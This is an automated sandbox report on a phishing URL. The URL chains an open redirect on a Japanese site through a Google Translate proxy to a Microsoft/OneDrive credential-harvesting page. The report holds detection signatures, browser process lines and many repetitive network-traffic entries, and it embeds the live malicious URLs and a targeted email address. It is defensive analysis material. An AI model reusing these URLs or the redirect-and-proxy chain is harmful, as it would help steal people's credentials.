Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.com

Overview

General Information

Sample URL:https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.com
Analysis ID:830992
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
Phishing site detected (based on logo template match)
Phishing site detected (based on image similarity)
URL contains potential PII (phishing indication)
HTML body contains low number of good links
Found iframes
Invalid T&C link found
No HTML title found

Classification

  • System is w10x64
  • chrome.exe (PID: 5820 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 6120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 6432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3164 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 4764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6152 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • chrome.exe (PID: 5180 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.com MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
96596.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.comSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

    Phishing

    barindex
    Source: Yara matchFile source: 96596.0.pages.csv, type: HTML
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comMatcher: Template: onedrive matched
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comMatcher: Found strong image similarity, brand: Microsoft image: 96596.0.img.1.gfk.csv D234686AEA3314E03DFEC220D3F3B5E0
    Source: https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.comSample URL: PII: https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.com
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: Number of links: 0
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: Number of links: 0
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: Iframe src: https://translate.google.com/websitetranslationui?parent=https%3A%2F%2Fremittanceadvice--details-glitch-me.translate.goog&pfu=https%3A%2F%2Fremittanceadvice--details-glitch-me.translate.goog%2Fremittance.html%3F_x_tr_sl%3Dauto%26_x_tr_tl%3Den%26_x_tr_hl%3Den%26_x_tr_pto%3Dwapp&u=https%3A%2F%2Fremittanceadvice-details.glitch.me%2Fremittance.html&sl=auto&tl=en&opu=https%3A%2F%2Ftranslate.google.com%2Fwebsite%3Fsl%3Dauto%26tl%3Den%26hl%3Den%26client%3Dwebapp%26u%3Dhttps%3A%2F%2Fremittanceadvice-details.glitch.me%2Fremittance.html%26anno%3D2&client=webapp&hl=en&lang=en&uip=true
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: Iframe src: https://translate.google.com/websitetranslationui?parent=https%3A%2F%2Fremittanceadvice--details-glitch-me.translate.goog&pfu=https%3A%2F%2Fremittanceadvice--details-glitch-me.translate.goog%2Fremittance.html%3F_x_tr_sl%3Dauto%26_x_tr_tl%3Den%26_x_tr_hl%3Den%26_x_tr_pto%3Dwapp&u=https%3A%2F%2Fremittanceadvice-details.glitch.me%2Fremittance.html&sl=auto&tl=en&opu=https%3A%2F%2Ftranslate.google.com%2Fwebsite%3Fsl%3Dauto%26tl%3Den%26hl%3Den%26client%3Dwebapp%26u%3Dhttps%3A%2F%2Fremittanceadvice-details.glitch.me%2Fremittance.html%26anno%3D2&client=webapp&hl=en&lang=en&uip=true
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: Invalid link: Privacy & Cookies
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: Invalid link: Privacy & Cookies
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: HTML title missing
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: HTML title missing
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: No <meta name="author".. found
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: No <meta name="author".. found
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: No <meta name="copyright".. found
    Source: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#dan@glassvice.comHTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
    Source: Binary string: _.hdb=_.K("MZfLnc");_.idb=_.K("nt4Alf");_.jdb=_.K("B01qod");_.kdb=_.K("fbgABc");_.ldb=_.K("LJ0EJd");_.mdb=_.K("m76vSb");_.wY=_.K("H1e5u");_.K("ORewz");_.ndb=_.K("kjpCo");_.odb=_.K("wv82t");_.K("jQE2Wd");_.pdb=_.K("mzWwbd");_.qdb=_.K("lYIUJf");_.rdb=_.K("XGCiZd");_.sdb=_.K("nO4Rvb");_.tdb=_.K("ETQGm");_.udb=_.K("lzRwDf");_.vdb=_.K("eRlb5");_.wdb=_.K("oBx8eb");_.xdb=_.K("Aq4dme");_.ydb=_.K("azdFVc");_.zdb=_.K("sxYq5b");_.Adb=_.K("x99D2c"); source: chromecache_549.1.dr
    Source: unknownDNS traffic detected: queries for: clients2.google.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50614
    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50395 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50532 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
    Source: unknownNetwork traffic detected: HTTP traffic on port 50314 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50589 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50600 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50371 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50487 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 50601 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50524
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50529
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50396 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50324 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50335 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50533 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50336 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50397 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50429 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50567 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50601
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50600
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50603
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50602
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50604
    Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50358 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50302 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50474 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50369 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50337
    Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50336
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50339
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50338
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50459
    Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
    Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50581 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50330
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
    Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50489 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50575
    Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
    Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50574
    Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50214
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50335
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50334
    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50580
    Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50569 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50328 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50469
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50468
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50589
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50229
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50461
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50582
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50581
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
    Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50342
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50584
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50341
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50462
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50583
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
    Source: unknownNetwork traffic detected: HTTP traffic on port 50339 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50344
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
    Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50343
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50464
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50585
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50345
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50466
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50363 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50238
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50359
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50358
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50479
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50239
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50472
    Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50471
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50232
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50474
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50594
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50476
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50597
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50596
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50357
    Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50478
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50599
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50598
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50481
    Source: unknownNetwork traffic detected: HTTP traffic on port 50288 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50490 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50385 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50369
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
    Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50580 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50241
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50362
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50483
    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50240
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50361
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50482
    Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50243
    Source: unknownNetwork traffic detected: HTTP traffic on port 50393 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50363
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50484
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50366
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50487
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50365
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50486
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
    Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50368
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50489
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50488
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50490
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50250
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50371
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50492
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50491
    Source: unknownNetwork traffic detected: HTTP traffic on port 50306 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 50478 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50414
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50413
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50415
    Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50419
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50594 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50531
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50412
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50533
    Source: unknownNetwork traffic detected: HTTP traffic on port 50338 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50532
    Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50425
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50426
    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50429
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
    Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
